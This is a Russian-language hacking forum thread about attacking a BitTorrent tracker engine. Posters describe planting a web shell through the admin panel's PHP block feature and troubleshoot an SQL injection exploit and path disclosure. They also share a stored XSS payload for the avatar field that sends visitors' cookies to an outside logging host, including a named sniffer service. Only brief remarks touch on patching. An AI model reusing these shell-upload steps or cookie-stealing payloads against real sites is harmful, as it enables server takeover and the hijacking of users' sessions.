Ваще самый лучший способ залить шелл это создать пихапе блок с формочкой загрузки файла Я так и заливал шелл
Плизз нид хелп! на висте х64 неудается запустить скрипт by Qwazar, вместо выполнения просто выдается содержимое файла. Пхп тот что нужно Если кто занет в чем может быть причина, подскажите плизз.
Qwazar, обьясни пожалуйста, как закрыть эти дыры ( защититься от сплойта.. раскрытия путей и т.д. ) +.
_Sniper_, как как.. легко ) Админка - Блоки - добавить файловый блок. указываешь тип PHP потом в поле тупо вставляешь код шела ( лучше криптованного ). и потом юзаешь по ссылке _http://targetsite/tracker/blocks/shall-block.php или block-shall.php не помню )
Ну у них же там на главной написано Вот, в общем, топик где были предложены их исправления. Имхо нифига не элегантно и порой избыточно, но: http://bit-torrent.kiev.ua/bnovlenie_bezopasnosti-t3319/index.html?t=3319
У меня при использовании сполйта пишет что неверные куки, pass incorect, хотя всё правильно. ЧТо не так?
Arigona Посмотри чтоб в конце адресса был слеш! http://target.com/ 1 bla bla у меня именно в слеше была проблема!
все прекрасно пашет, читай ман по SQL, разве не видиш что ругается на синтаксис ? значит скуля есть, тоько ты пишеш не правельно! Вообщем патч хендс з.ы. если прочтеш внимательно мой пост с багой то там написано ПРИМЕР, тоесть это пример конкретно для сайта на котором это проделывал я, у вас и версия SQL может быть другая и путь другой, как найти путь написано в этой же теме, поэтому если у вас не хватает знаний чтобы заюзать багу, то не нужно кричать что она не пашет!
В настройках профиля во вкладке аватар можно реализовать XSS: Code: http://host.org/1.jpg onload= location.href='http://host.org/log.php?c='+document.cookie;//
Qwazar, понял. А возможно реализовть сплоит под другую sql уязвимость? У многих нет requests.php просто.. вот раскрытый путь обнаружил: details.php?id[]= мне кажеться тут что-то скрывается
baltazar, как? ВОт если я пользуюсь снифером na-s.ru http://google/1.jpg onload= location.href='http://na-s.ru/limage.jpg?c='+document.cookie;// Правильно?